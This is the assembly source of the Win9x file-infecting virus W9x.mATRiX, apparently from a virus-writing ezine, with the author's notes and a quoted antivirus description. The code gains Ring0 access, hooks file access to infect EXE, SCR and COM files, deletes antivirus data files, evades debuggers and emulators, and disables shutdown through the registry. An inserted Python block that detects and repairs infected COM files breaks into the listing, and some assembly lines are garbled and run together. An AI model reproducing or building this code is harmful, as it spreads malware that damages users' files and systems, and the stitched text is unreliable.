;ú ÄÍÄÍÍÍÍÄÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÄúÄÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÄÍÍÍÄÍÄ ú
;                 [ASCII-art logo: W9x.mATRiX 2000, signed LW]
;
;           W9x.mATRiX.size by LiFEwiRE [ShadowVX] - www.shadowvx.org
;
;
; Intro
;
; This virus is my first windows virus, and the result of reading some
; docs, tutorial and (Ring0 virus)-sources.
;
; It is not a very complicated virus, and it doesn't use new techniques
; too... Maybe the ASCII counter is some unusual feature.
;
; When debugging is enabled, these things are extra:
;
;   Unload when dword at bff70400 <> 0h
;   Beep at certain events (get resident, unload & infect)
;   Beep can be turned off by changing byte ptr at bff70408 <> 0h
;   only infects files at your D: drive (it's my test drive)
;
; I use WinIce to modify the values.
;
; Specs:
;
; Ring0 resident, infects on IFSmgr file rename, open and attrib, EXE,
; SCR and COM (!) files. Com files are infected for the payload, a scene
; from The Matrix. The COM files are not really infected, but some date
; checking code and action is appended on it. When the month is equal
; to the date the payload will start.
;
; Infection   : Increasing last section, and make a jump at original
;               entrypoint to it (when modifying EP to last section
;               AVPM will popup:( )
;
; Encryption  : XOR'd and polymorphic-build-up-decryptors.
; Armour      : Anti debugger & anti emulator (SEH & Anti-SoftICE)
;
; Payload(s)  : 2, as i said above 1 which is appended to all .com files
;               on opening and c:\windows\win.com which will display
;               'Wake up Neo... / The Matrix has you... / w9x.mATRiX'
;               like in the movie (except the last sentence, w9x.mATRiX:)
;               when the day is equal to the month (1 jan, 2 feb, etc.)
;
;               the other payload will remove the shutdown command from
;               the start menu using the registry - at 06 april.
;
; KnownBugs   : No I know... I tested this code a lot, and a friend of me
;             : infected his own PC accidentally and it worked really good
;             : :)... The only problem is that F-prot hangs on infected
;               files... hehe but that's not my problem :)
;
; Thanx to    : Lord Julus, Billy Belcebu & Z0MBiE.
;
; Greets to   : Ruzz', Kamaileon, z3r0, Bhunji, Dageshi, all other Shadow-


;               VX members, r-, GigaByte, VirusBuster, CyberYoda, T00fic,
;               all other people i met on #virus & #vir, and 29A & iKX
;               for their nice magazines.
;
;               and some non-virus greets:
;
;               Ghostie :P, Hampy, nog wat XXX Clan'ers, DJ Accelerator,
;               King Smozzeboss SMOS from Conehead SMOS games [NL1SMS]
;               PiepPiep, NL0JBL, BlueLIVE, MisterE & Xistence.
;
; Compile:      Tasm32 /m3 /ml LiFEwiRE.ASM,
;               tlink32 /Tpe /aa /c LiFEwiRE.OBJ,,,import32.lib
;               pewrsec LiFEwiRE.EXE
;
; Contact:      [email protected]
;
;
;úÄÍÄÍÍÍÍÄÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÄúÄÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÄÍÍÍÄÍÄ ú ÿ
;
;Description at www.viruslist.com
;
;Win95.Matrix
;
;
;It is not a dangerous memory resident polymorphic parasitic Win9x virus. It
;stays in the Windows memory as a device driver (VxD) by switching from
;application mode to Windows kernel (Ring3->Ring0), hooks disk files access
;functions, and infect PE executable files with EXE and SCR file name
;extensions, and affects DOS COM files.
;
;While infecting a PE EXE file the virus encrypts itself and writes to the
;file end. The virus also patches program's startup code with a short routine
;that passes control to main virus code.
;
;While affecting DOS COM files the virus writes to the end of file a short
;routine that has no infection abilities, but just displays a message on
;July 7th:
;
;  Wake up, Neo...
;  The Matrix has you...
;  w9x.mATRiX
;
;The virus also affects the C:\WINDOWS\WIN.COM file in the same way.
;
;On April 6th the virus modifies the system registry key:
;
;HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer NoClose = 1
;
;As the result of this key a user cannot switch off the computer.
;
;The virus also deletes anti-virus data files: AVP.CRC, ANTI-VIR.DAT, IVB.NTZ,
;CHKLIST.MS.
;
;The virus contains the text strings:
;
;[- comment from LiFEwiRE - AV'ers forgot to put the strings here??]
;
;where 'xxxxxxx' is the virus' "generation" number.
;
;
;úÄÍÄÍÍÍÍÄÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÄúÄÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÄÍÍÍÄÍÄ ú ÿ


.486p

.model flat
locals
jumps

extrn   ExitProcess:PROC                ; ;only 4 first gen.

;------[Equ's]--------------------------------------------------------------;

debug           equ     1               ;test/debug version?

virusz          equ     offset end - offset start
sectionflags    equ     00000020h or 80000000h or 20000000h

if debug eq 1
inthook         equ     05h             ;let's hook this int for ring0

else
inthook         equ     03h             ;let's hook this int for ring0

endif

JmpToCodesz     equ     offset EndJmpToCode - offset JmpToCode

IFSMgr          equ     0040h           ;for VxDCall
InstallFileSystemApiHook equ 067h       ;used in ring0 hooker
UniToBCSPath    equ     041h            ;used in hook to convert uni2ansi
Ring0_FileIO    equ     032h            ;for all file i/o

IFSFN_FILEATTRIB equ    21h             ;hooked functions
IFSFN_OPEN      equ     24h
IFSFN_RENAME    equ     25h

R0_OPENCREATFILE equ    0D500h          ;used with ring0_fileIO
R0_CLOSEFILE    equ     0D700h
R0_WRITEFILE    equ     0D601h
R0_READFILE     equ     0D600h
R0_GETFILESIZE  equ     0D800h
R0_FILEATTRIBUTES equ   04300h
GET_ATTRIBUTES  equ     00h
SET_ATTRIBUTES  equ     01h
R0_DELETEFILE   equ     04100h

PC_STATIC       equ     20000000h       ;for allocating pages
PC_WRITEABLE    equ     00020000h       ;and protecting them from
PC_USER         equ     00040000h       ;ring3 code
PAGEZEROINIT    equ     00000001h
PAGEFIXED       equ     00000008h
PG_SYS          equ     1

Get_DDB         equ     0146h           ;VMMCall to find S-ICE

PageAllocate    equ     0053h
PageModifyPermissions equ 0133h

SizeInPages     equ     (virusz+1000+4095)/4096

RegOpenKey      equ     0148h           ;used by payload for registry
RegSetValueEx   equ     0152h           ;modifying
HKEY_CURRENT_USER equ   80000001h       ;
REG_DWORD       equ     4               ;

debug_beep_FREQ equ     1700            ;for debugging


debug_beep_DELAY equ    50*65536

debug_beep_FREQ2 equ    700             ;for debugging
debug_beep_DELAY2 equ   100*65536

;------[Macro's]------------------------------------------------------------;

VxDCall macro   vxd_id, service_id
        int     20h
        dw      service_id
        dw      vxd_id
endm

VMMCall macro   service_id              ;Is just less work than doing
        int     20h                     ;a VxDCall VMM, service
        dw      service_id
        dw      0001h
endm

if debug eq 1
;       display "Debug Version"

else
        display " °±²Û *Warning* This is the real version of the virus Û²±°"

endif

;------[Code]---------------------------------------------------------------;
_CODE segment dword use32 public 'CODE'

start:
        pushad

        call    getdelta
getdelta:

        pop     ebp
        sub     ebp, offset getdelta

        sub     eax, 00001000h          ;Get imagebase at runtime
newEIP  equ     $-4

        mov     dword ptr [imagebase+ebp], eax

        pushad

        call    setupSEHandKillEmu      ;The call pushes the offset

        mov     esp, [esp+8]            ;Error gives us old ESP

        jmp     backtocode

setupSEHandKillEmu:
        xor     edx, edx                ;fs:[edx] = smaller then fs:[0]
        push    dword ptr fs:[edx]      ;Push original SEH handler
        mov     fs:[edx], esp           ;And put the new one (located
        dec     byte ptr cs:[edx]       ;make error & let our SEH take

                                        ;control (not nice 4 emu's:)
backtocode:

        pop     dword ptr fs:[0]
        pop     edx                     ;pops EIP pushed by call setupSEH

        popad

        call    SetupSEH                ;to kill errors


;if eip gets here an error has occured

        mov     esp, [esp+8]            ;contains old ESP

        jmp     RestoreSEH              ;...

SetupSEH:
        xor     edx, edx                ;we are save now, if an error
        push    dword ptr fs:[edx]      ;occure EIP will be at the
        mov     fs:[edx], esp           ;code after SetupSEH

        push    edx
        sidt    fword ptr [esp-2]       ;'push' int table
        pop     edx                     ;restore stack from call and

                                        ;edx contains pointer to IDT

        add     edx, (inthook*8)+4      ;Get int vector

        mov     ebx, dword ptr [edx]
        mov     bx, word ptr [edx-4]

        lea     edi, dword ptr [ebp+Inthandler] ;routine to let int point to

        mov     word ptr [edx-4], di
        shr     edi, 16                 ;high/low word
        mov     word ptr [edx+2], di

        int     inthook                 ;call int, int will be ring0!

        mov     word ptr [edx-4], bx    ;Restore old interrupt values
        shr     ebx, 16
        mov     word ptr [edx+2], bx

RestoreSEH:

        xor     edx, edx
        pop     dword ptr fs:[edx]
        pop     edx                     ;pops offset pushed by CALL

        mov     edi, dword ptr [imagebase+ebp]  ;--- Restore old bytes ---;
        add     edi, dword ptr [base+ebp]       ;do at it ring0 to avoid

                                        ;page errorz
        lea     esi, [offset oldbytes+ebp]
        mov     ecx, JmpToCodesz
        rep     movsb                   ;restore bytes from host

        popad

        mov     eax, 00h                ;--- return to host ---;
imagebase equ   $-4

        add     eax, offset host - 0400000h     ;1st gen
base    equ     $-4

        push    eax
        ret

;---------------------------------------------------------------------------;
;                            **** RING0 LOADER ****
;---------------------------------------------------------------------------;
Inthandler:

        pushad


        mov     eax, 0bff70404h         ;already loaded?
        cmp     dword ptr [eax], eax
        je      back2ring3
        mov     dword ptr [eax], eax

        push    PAGEFIXED + PAGEZEROINIT
        xor     eax, eax
        push    eax                     ;PhysAddr
        push    eax                     ;maxPhys
        push    eax                     ;minPhys
        push    eax                     ;Align
        push    eax                     ;handle of VM = 0 if PG_SYS
        push    PG_SYS                  ;allocate memory in system area
        push    SizeInPages*2           ;nPages

VxD1V   equ     00010053h
VxD1:   VMMCall PageAllocate

        add     esp, 8*4

        or      eax, eax                ;eax = place in mem
        jz      back2ring3              ;if zero error :(

        mov     edi, eax                ;set (e)destination

        push    eax

        push    edi
        lea     esi, [offset start+ebp] ;set source
        mov     ecx, virusz             ;virussize
        cld                             ;you never know with poly :)

        rep     movsb                   ;copy virus to allocated mem
        pop     edi

        mov     dword ptr [edi+delta-start], edi

        lea     ecx, [edi+offset hook - offset start]   ;Install FileSystem Hook
        push    ecx

VxD2V   equ     InstallFileSystemApiHook + 256*256*IFSMgr
VxD2:   VxDCall IFSMgr, InstallFileSystemApiHook

        pop     ecx

        mov     [edi+nexthook-start], eax

        pop     eax

        push    PC_STATIC
        push    020060000h              ;new paging settings
        push    SizeInPages*2
        shr     eax, 12
        push    eax

VxD5V   equ     00010133h
VxD5:   VMMCall PageModifyPermissions

        add     esp, 4*4

        call    CheckThePayloadDate     ;(and mayB do something:)

if debug eq 1
        call    debug_beep2

endif

back2ring3:


if debug eq 1
        call    debug_beep

endif

        popad
        iretd                           ;exit int (to ring3!)

;---------------------------------------------------------------------------;

host:
oldbytes:

        Push    0
        Call    ExitProcess
        db      JmpToCodesz-5 dup (176d)

;---------------------------------------------------------------------------;
;                          **** FILESYSTEM HOOK ****
;---------------------------------------------------------------------------;

hook:
        push    ebp
        mov     ebp, esp

        sub     esp, 20h

        push    ebx
        push    esi
        push    edi

        db      0bfh                    ;mov edi,DeltaInMem
delta   dd      0

        cmp     dword ptr [busy-start+edi], not "BuSY"  ;...are we busy?
        je      back

if debug eq 1
        cmp     dword ptr [death-start+edi], 'TRUE'
        je      back

endif

        mov     eax, dword ptr [ebp+0Ch]        ;EAX = Function
        not     eax

        cmp     eax, not IFSFN_OPEN     ;File Open? try it
        jz      infect

        cmp     eax, not IFSFN_RENAME   ;Rename? try it
        jz      infect

        cmp     eax, not IFSFN_FILEATTRIB       ;File Attributes? try it
        jz      infect

back:   mov     eax, [ebp+28]           ; call the old

        push    eax
        mov     eax, [ebp+24]
        push    eax
        mov     eax, [ebp+20]
        push    eax
        mov     eax, [ebp+16]
        push    eax
        mov     eax, [ebp+12]
        push    eax
        mov     eax, [ebp+8]


        push    eax

        db      0b8h
nexthook dd     0

        call    [eax]

        add     esp, 6*4

        pop     edi
        pop     esi
        pop     ebx

        leave
        ret

;---------------------------------------------------------------------------;
;                    **** SOME CHECKS BEFORE INFECTING ****
;---------------------------------------------------------------------------;

infect:
        pushad

if debug eq 1
        mov     eax, 0bff70400h
        mov     eax, dword ptr [eax]
        or      eax, eax
        jz      stayalive               ;kill ourself?

        mov     dword ptr [edi+death-start], 'TRUE'

        call    debug_beep
        call    debug_beep2
        call    debug_beep2
        call    debug_beep2
        call    debug_beep

        mov     eax, 0bff70400h

        xor     edx, edx
        mov     dword ptr [eax], edx
        mov     dword ptr [eax+4], edx

stayalive:

endif

        mov     dword ptr [busy-start+edi], not 'BuSY'

        lea     esi, [edi+filename-start]       ;file buffer

        mov     eax, dword ptr [ebp+16]
        cmp     al, 0ffh                ;no drive defined?
        je      nopath
        add     al, 40h                 ;a=1,b=2,a+40h='A',b+40h='B'
        mov     byte ptr [esi], al
        mov     word ptr [esi+1], ':'
        add     esi, 2

nopath:
        xor     eax, eax
        push    eax                     ;push 0    ;BCS/WANSI
        inc     ah                      ;ax=100h
        push    eax                     ;push 100h ;buf size
        mov     eax, [ebp+28]


        mov     eax, [eax+12]
        add     eax, 4
        push    eax                     ;filename
        push    esi                     ;destination (buffer)

VxD3V   equ     UniToBCSPath + 256*256*IFSMgr
VxD3:   VxDCall IFSMgr, UniToBCSPath    ;Convert to ASCII

        add     esp, 4*4                ;restore stack
        add     esi, eax                ;eax = length
        mov     byte ptr [esi], 0       ;make ASCIIZ

        mov     eax, dword ptr [esi-4]

        not     eax                     ;
        cmp     eax, not 'EXE.'         ;normal exe?
        je      infectit

        cmp     eax, not 'RCS.'         ;screensaver?
        je      infectit

        cmp     eax, not 'MOC.'         ;a com? (indeed !!:)
        jne     nocomfile
        jmp     payloadinfector

nocomfile:

quitinfect:

        mov     dword ptr [busy-start+edi], eax ;hope eax <> 'busy' :)
        popad

        jmp     back

        db      "<w9x.mATRiX."
        db      virusz/1000 mod 10+'0'
        db      virusz/0100 mod 10+'0'
        db      virusz/0010 mod 10+'0'
        db      virusz/0001 mod 10+'0', "."
counter db      "0001086 & MyLittlePoly."       ;enough space for counter :)
        db      polysz/1000 mod 10+'0'
        db      polysz/0100 mod 10+'0'
        db      polysz/0010 mod 10+'0'
        db      polysz/0001 mod 10+'0'

if debug eq 1
        db      " Debug Version"
endif

        db      " by LiFEwiRE [sHAD0WvX]>"

dontinfect:                             ;when attrs. were already modified
        pop     esi                     ;get attribs + 1 = set
        pop     ecx                     ;old attrs
        pop     eax                     ;pointer to buffer with filen.
        call    R0_FileIO               ;RESTORE ATTRIBUTES
        jmp     quitinfect

cryptkey  dd    0
cryptkey2 dw    0


;---------------------------------------------------------------------------;
;                        **** REAL PE INFECTION PART ****
;---------------------------------------------------------------------------;

infectit:

        lea     esi, [edi+filename-start]

        call    checkname
        jc      quitinfect              ;if name = bad

if debug eq 1
        cmp     word ptr [esi], ":D"
        jne     quitinfect

endif

        mov     eax, R0_FILEATTRIBUTES + GET_ATTRIBUTES
        push    eax
        call    R0_FileIO

        pop     eax
        inc     eax                     ;eax=4300+1 = set
        push    eax
        push    ecx                     ;save attribs
        push    esi                     ;and esi,no new LEA needed
        xor     ecx, ecx                ;new attr
        call    R0_FileIO

        xor     ecx, ecx                ;ecx=0
        mov     edx, ecx                ;
        inc     edx                     ;edx=1
        mov     ebx, edx                ;
        inc     ebx                     ;ebx=2
        mov     eax, R0_OPENCREATFILE
        call    R0_FileIO
        jc      dontinfect

        mov     ebx, eax                ;file handle

        lea     esi, [edi+pointertope-start]    ;read pointer to PE at 3ch
        mov     ecx, 4                  ;into pointertope
        mov     edx, 03ch
        mov     eax, R0_READFILE
        call    R0_FileIO

        lea     esi, [edi+peheader-start]       ;peheader buffer
        mov     ecx, 1024               ;1024 bytes
        mov     edx, dword ptr [edi+pointertope-start]  ;pointer to pe header
        mov     eax, R0_READFILE        ;...
        call    R0_FileIO

        cmp     word ptr [esi], 'EP'    ;is pe?
        jne     nope                    ;nope, its noPE :)

        mov     eax, 0badc0deh          ;already infected?
        cmp     dword ptr [esi+4ch], eax        ;4ch = reserved
        je      nope
        mov     dword ptr [esi+4ch], eax

        push    ebp
        push    edi
        push    ebx                     ;save handle for after calcs.


        mov     ebp, edi

        mov     edi, esi
        add     esi, 18h                ;esi+18h=start of OptionalHeader
        add     si, word ptr [esi+14h-18h]      ;esi-4 = pe/0/0+14h = size OH

                                        ;optionalheader+size=allocation table

                                        ;edi = PE/0/0, esi = allocation table

        push    esi
        xor     ecx, ecx
        mov     cx, word ptr [edi+6]    ;put in ecx nr. of sections
        xor     eax, eax                ;startvalue of eax
        push    cx                      ;

sectionsearch:
        cmp     dword ptr [esi+14h], eax        ;is it the highest?
        jb      lower                   ;no
        mov     ebx, ecx                ;remember section nr.
        mov     eax, dword ptr [esi+14h]        ;and remember value

lower:
        add     esi, 28h                ;steps of 28h
        loop    sectionsearch
        pop     cx

        sub     ecx, ebx

        mov     eax, 28h                ;multiply with section length
        mul     ecx
        pop     esi
        add     esi, eax                ;esi points now to section header

; Section header layout, Tdump names things other (4 example rawdata)
;
; esi+0h   8h  Section's name (.reloc, .idata, .LiFEwiRE)
;     8h   4h  VirtualSize
;     0ch  4h  RelativeVirtualAdress
;     10h  4h  SizeOfRawData
;     14h  4h  PointerToRawData
;     18h  4h  PointerToRelocations
;     1ch  4h  PointerToLinenumbers
;     20h  2h  NumberOfRelocations
;     22h  2h  NumberOfLinenumbers
;     24h  4h  Characteristics

; ESI points to Section header, EDI points to PE

        or      [esi+24h], sectionflags ; Update section's flagz

        mov     edx, [esi+10h]          ; EDX = SizeOfRawData
        mov     eax, edx                ; EAX = SizeOfRawData
        add     edx, [esi+0Ch]          ; EDX = New EIP
        add     eax, [esi+14h]          ; EAX = Where append virus
        push    eax                     ; Save it

        push    esi

        add     eax, [esi+0Ch]
        mov     [edi+50h], eax

        mov     eax, [edi+28h]          ;backup entry RVA
        mov     dword ptr [ebp+base-start], eax ;...
        mov     dword ptr [ebp+newEIP-start], edx       ;save it


        add     edx, dword ptr [edi+34h]        ;edx=neweip+imagebase

        mov     dword ptr [ebp+distance-start], edx     ; Store the address

        mov     esi, edi
        add     esi, 18h                ;esi+18h=start of OptionalHeader
        add     si, word ptr [esi+14h-18h]      ;esi-4 = pe/0/0+14h = size OH

;ESI points to the allocation table,EDI to PE

;lets find the section which contains the RVA.

;then the place where to put the jump is entry-rva+phys.

        sub     esi, 28h

look:   add     esi, 28h
        mov     edx, eax                ;Old EntryPoint (RVA)
        sub     edx, dword ptr [esi+0Ch]        ;VirtualAddres
        cmp     edx, dword ptr [esi+08h]        ;VirtualSize
        jae     look

        sub     eax, dword ptr [esi+0ch]        ;sub RVA
        add     eax, dword ptr [esi+14h]        ;add PhysicalOffset

                                        ;EAX is now the PhysicalOffset
                                        ;of the EntryPoint

        or      [esi+24h], sectionflags ; Update section's flagz

        pop     esi
        pop     edx
        pop     ebx

        push    edx                     ;
        push    esi
        push    eax

        lea     esi, [ebp+oldbytes-start]       ;read pointer to PE at 3ch
        mov     ecx, JmpToCodesz        ;into pointertope
        mov     edx, eax
        mov     eax, R0_READFILE
        call    R0_FileIO

        mov     word ptr [ebp+randombla-start], ax      ;random value

        pop     edx                     ;and write new bytes at entry
        lea     esi, [ebp+JmpToCode-start]      ;point to make code jmp to
        mov     eax, R0_WRITEFILE       ;the section which contains
        mov     ecx, JmpToCodesz        ;the viruscode (modifying the
        call    R0_FileIO               ;entry RVA will alert AV's)

        call    VxDPatch                ;unpatch VxDCalls (and VMM)

        call    IncCounter              ;a ASCII counter rules

        call    encrypt                 ;encrypt,createpoly,returnsize (in ecx)

                                        ;encrypt-^ returns the virus size in ecx

        mov     eax, ecx
        mov     ecx, [edi+3Ch]          ;ECX = Alignment


        push    edx                     ; Align
        xor     edx, edx
        push    eax
        div     ecx
        pop     eax
        sub     ecx, edx
        add     eax, ecx
        pop     edx
        mov     ecx, eax                ;aligned size to append

        pop     esi

        add     [esi+10h], eax          ; Size of rawdata
        mov     eax, [esi+10h]          ;
        add     [esi+08h], eax          ; & virtual size

        pop     edx
        push    edi
        lea     esi, [ebp+viruscopy-start]      ;polymorfer returns size in
        mov     eax, R0_WRITEFILE       ;the ECX register
        push    eax
        call    R0_FileIO               ;append virus

        pop     eax
        pop     esi
        mov     ecx, 1024
        mov     edx, [ebp+pointertope-start]
        call    R0_FileIO               ;overwrite PE header

        pop     edi
        pop     ebp

nope:
        mov     eax, R0_CLOSEFILE
        call    R0_FileIO

if debug eq 1
        call    debug_beep

endif

        call    killAVfiles
        call    infectwindotcom         ;for payload

        jmp     dontinfect

windotcom db    "C:\WINDOWS\WIN.COM", 0h        ;for payload
sizewdc equ     $-offset windotcom

avpcrc     db   9, "AVP.CRC", 0h
antivirdat db   14, "ANTI-VIR.DAT", 0h
ivbntz     db   9, "IVB.NTZ", 0h
chklistms  db   12, "CHKLIST.MS", 0h

killAVfiles:
        pushad

        ;first add the path to the filename
        mov     ebp, edi

        lea     edx, [offset avpcrc-start+ebp]

        mov     ecx, 4
killing:

Page 86: EZine - Coderz #1

call killthisfilexor ebx , ebxmov bl ,byte ptr [ edx ]add edx , ebxloop killing

popad

ret

killthisfile :pushadlea edi ,[ offset filename - start +ebp ]push edi

mov al , '.'cldscasb ;search from left to right for the dotjne $- 1

stdmov al , '\' ;search from right to left for the \

scasbjne $- 1

xor ecx , ecx

inc edi ;edi pointed to char before \ inc edi ;edi pointed to \

cld

mov esi , edxlodsbmov cl , al

rep movsb

pop esimov eax , R0_DELETEFILEmov ecx , 2027hcall R0_FileIOpopadret

;--------------------------------------------------------------------------
; **** MODIFIES COM FILES FOR PAYLOAD, SPECIAL FOR WIN.COM ***
;--------------------------------------------------------------------------

infectwindotcomflag db 0h

infectwindotcom:                           ;called if virus is not resident
        pushad
        mov byte ptr [edi+offset infectwindotcomflag-start], '!'

        push edi

        lea esi, [offset windotcom-start+edi]
        lea edi, [offset filename-start+edi]
        mov ecx, sizewdc
        cld
        rep movsb

        pop edi

        jmp payloadinfector

backfrominfecting:
        mov byte ptr [edi+offset infectwindotcomflag-start], 173d ;-
        popad
        ret

;--------------------------------------------------------------------------

jmpop   dw 0e990h                          ;nop & jmp
jmpval  dw ?

;--------------------------------------------------------------------------

payloadinfector:
if debug eq 1
        cmp dword ptr [esi-8], 'PRUB'      ;*BURP.COM ?
        jne wegvancom
endif

        lea esi, [edi+filename-start]

        xor ecx, ecx                       ;ecx=0
        mov edx, ecx                       ;
        inc edx                            ;edx=1
        mov ebx, edx                       ;
        inc ebx                            ;ebx=2
        mov eax, R0_OPENCREATFILE
        call R0_FileIO
        jc wegvancom

        mov ebx, eax                       ;file handle

        lea esi, [edi+first4bts-start]     ;read first 4 bytes
        mov ecx, 4
        xor edx, edx
        mov eax, R0_READFILE
        call R0_FileIO

        cmp word ptr [edi+first4bts-start], 'ZM'   ;a renamed EXE ??
        je closecomfile

        cmp word ptr [edi+first4bts-start], 0e990h ;already infected?
        je closecomfile

        mov eax, R0_GETFILESIZE
        call R0_FileIO                     ;get its size

        cmp eax, 0ffffh-0100h-dospayloadsize ;infectable?
        ja closecomfile

        push eax

        sub eax, 4
        mov word ptr [edi+jmpval-start], ax ;distance to jmp

        lea esi, [edi+offset jmpop-start]  ;Write new JMP at 0h
        mov eax, R0_WRITEFILE
        mov ecx, 4
        xor edx, edx
        push eax
        call R0_FileIO

        pop eax
        pop edx                            ;place to append
        push edx
        lea esi, [edi+offset dospayload-start]
        mov ecx, dospayloadsize
        call R0_FileIO

        pop edx                            ;read 7 bytes before the end
        push edx
        sub edx, 7
        mov ecx, 7
        mov eax, R0_READFILE
        lea esi, [edi+offset filename-start] ;just a buffer
        call R0_FileIO

        pop edx

        cmp word ptr [edi+offset filename-start+3], 'SN' ;ENUNS? (ENU is
        jne closecomfile                   ;optional)

        add word ptr [edi+offset filename-start+5], dospayloadsize+7

        mov ecx, 7

        lea esi, [edi+offset filename-start]
        mov eax, R0_WRITEFILE
        add edx, dospayloadsize
        call R0_FileIO                     ;append updated ENUNS

closecomfile:
        mov eax, R0_CLOSEFILE
        call R0_FileIO

wegvancom:
if debug eq 1
        call debug_beep
endif

        cmp byte ptr [edi+offset infectwindotcomflag-start], '!'
        je backfrominfecting

        jmp quitinfect

;--------------------------------------------------------------------------
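The payloadinfector routine above marks a .COM host by overwriting its first four bytes with nop / jmp rel16 (the word 0E990h), appending the 234-byte DOS payload followed by the saved original four bytes (first4bts, so dospayloadsize is 238), and, for a WIN.COM-style host, a re-appended 7-byte ENUNS trailer copy; the size guard refuses hosts larger than 0FFFFh-100h-dospayloadsize. The Python below is an added example written for this page, not code from the listing or its author: it checks a .COM image against exactly that layout and, when the layout matches, rebuilds the clean host from the saved bytes and the original length (the in-place trailer is never modified by the routine, so truncation restores it). The sample images it builds are constructed inline, with an inert NOP filler standing in for the payload.

```python
import struct

PAYLOAD_LEN = 234            # appended DOS payload, 0EAh bytes in the listing
SAVED_LEN = 4                # first4bts: the original head bytes stored after it
TRAILER_LEN = 7              # "ENUNS" trailer copy re-appended for WIN.COM
BLOCK = PAYLOAD_LEN + SAVED_LEN           # dospayloadsize as the listing computes it
MAX_HOST = 0xFFFF - 0x100 - BLOCK         # the listing's infectable-size guard


def classify_com(data: bytes) -> dict:
    """Report whether a .COM image carries the nop/jmp + appended-block layout."""
    res = {"infected": False, "original_size": None, "enuns": False}
    if len(data) < 4 + BLOCK or data[:2] != b"\x90\xE9":
        return res
    disp = struct.unpack_from("<H", data, 2)[0]
    target = 4 + disp                     # jmp sits at offset 1, next IP is offset 4
    extra = len(data) - target            # bytes appended after the original host
    if target > MAX_HOST or extra not in (BLOCK, BLOCK + TRAILER_LEN):
        return res
    res.update(infected=True, original_size=target,
               enuns=(extra == BLOCK + TRAILER_LEN))
    return res


def repair_com(data: bytes) -> bytes:
    """Put the saved head bytes back and drop everything past the original length."""
    info = classify_com(data)
    if not info["infected"]:
        return data
    n = info["original_size"]
    head = data[n + PAYLOAD_LEN: n + BLOCK]   # first4bts lives right after the payload
    return head + data[4:n]


def build_samples():
    """Constructed clean host and a same-layout marked copy; the payload slot is
    filled with NOPs, so no real payload bytes appear here."""
    clean = b"\xB4\x4C\xCD\x21" + b"\x90" * 296     # mov ah,4Ch / int 21h, 300 bytes
    marked = (b"\x90\xE9" + struct.pack("<H", len(clean) - 4)
              + clean[4:] + b"\x90" * PAYLOAD_LEN + clean[:4])
    return clean, marked


if __name__ == "__main__":
    clean, marked = build_samples()
    print(classify_com(clean))
    print(classify_com(marked))
    print(repair_com(marked) == clean)
```

The check keys on structure (marker word, jump landing exactly at the old end of file, appended length equal to dospayloadsize or dospayloadsize+7) rather than on payload bytes, so it also reports a host whose appended payload has been altered, which a byte signature would miss.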

;--------------------------------------------------------------------------
; *** BEEPS used if debug equ 1 ***
;--------------------------------------------------------------------------

if debug eq 1
debug_beep:
        push eax
        push ecx

        mov eax, 0bff70408h

        cmp byte ptr [eax], 0
        jne geenirritantgebiepvandaag

        mov al, 0B6h
        out 43h, al

        mov al, (12345678h/debug_beep_FREQ) and 255
        out 42h, al
        mov al, ((12345678h/debug_beep_FREQ) shr 16) and 255
        out 42h, al

        in al, 61h
        or al, 3
        out 61h, al

        mov ecx, debug_beep_DELAY
        loop $

        in al, 61h
        and al, not 3
        out 61h, al

        pop ecx
        pop eax
        ret

debug_beep2:
        push eax
        push ecx

        mov al, 0B6h
        out 43h, al

        mov al, (12345678h/debug_beep_FREQ2) and 255
        out 42h, al
        mov al, ((12345678h/debug_beep_FREQ2) shr 16) and 255
        out 42h, al

        in al, 61h
        or al, 3
        out 61h, al

        mov ecx, debug_beep_DELAY2
        loop $

        in al, 61h
        and al, not 3
        out 61h, al

geenirritantgebiepvandaag:                 ;blah, you won't understand this anyway, loser :P

        pop ecx
        pop eax
        ret
endif

;--------------------------------------------------------------------------
; File IO function, called lot of times, better for patching callback
;--------------------------------------------------------------------------

R0_FileIO:
VxD4V   equ Ring0_FileIO+256*256*IFSMgr
VxD4:   VxDCall IFSMgr, Ring0_FileIO
        ret

;--------------------------------------------------------------------------

;--------------------------------------------------------------------------
; Increases the ASCII counter of infections
;--------------------------------------------------------------------------

IncCounter:                                ;counts an ASCII counter... when there are more than
                                           ;9999999 files infected it contains a bug, but i don't
        lea esi, [offset counter-start+6+ebp] ;expect that from this vir :)

next:   inc byte ptr [esi]
        cmp byte ptr [esi], '9'+1
        jb ok
        mov byte ptr [esi], '0'
        dec esi
        jmp next

ok:     ret

;--------------------------------------------------------------------------

;------------------------------------------------------------------------------
; Some things used in the registry payload
;------------------------------------------------------------------------------

KeyOfPolicies db "Software\Microsoft\Windows\CurrentVersion\Policies\Explorer", 0h
valuename1    db "NoClose", 0h             ;no shutdown :)
ValueToSet    dd 1h

CheckThePayloadDate:

        mov al, 07h                        ;Get day
        out 70h, al                        ;(returns it in hex btw!)
        in al, 71h

        cmp al, 06h                        ;Is it 6th?
        jnz noPayload

        mov al, 08h                        ;Get month
        out 70h, al                        ;(returns it in hex btw!)
        in al, 71h

        cmp al, 04h                        ;Is it 4th?
        jnz noPayload                      ;(

        lea eax, [offset pointertope+ebp]  ;just a buffer
        push eax
        lea eax, [offset KeyOfPolicies+ebp] ;open this key
        push eax
        push HKEY_CURRENT_USER             ;

VxD6V   equ RegOpenKey+256*256*1
VxD6:   VMMCall RegOpenKey

        add esp, 3*4                       ;reset stackpointer

        push 4                             ;length of value
        lea eax, [offset ValueToSet+ebp]   ;set value true
        push eax
        push REG_DWORD                     ;type
        push 0                             ;reserved
        lea eax, [offset valuename1+ebp]
        push eax
        push [pointertope+ebp]             ;handle

VxD7V   equ RegSetValueEx+256*256*1        ;1 = VMM
VxD7:   VMMCall RegSetValueEx

        add esp, 6*4

noPayload:
        ret

;--------------------------------------------------------------------------

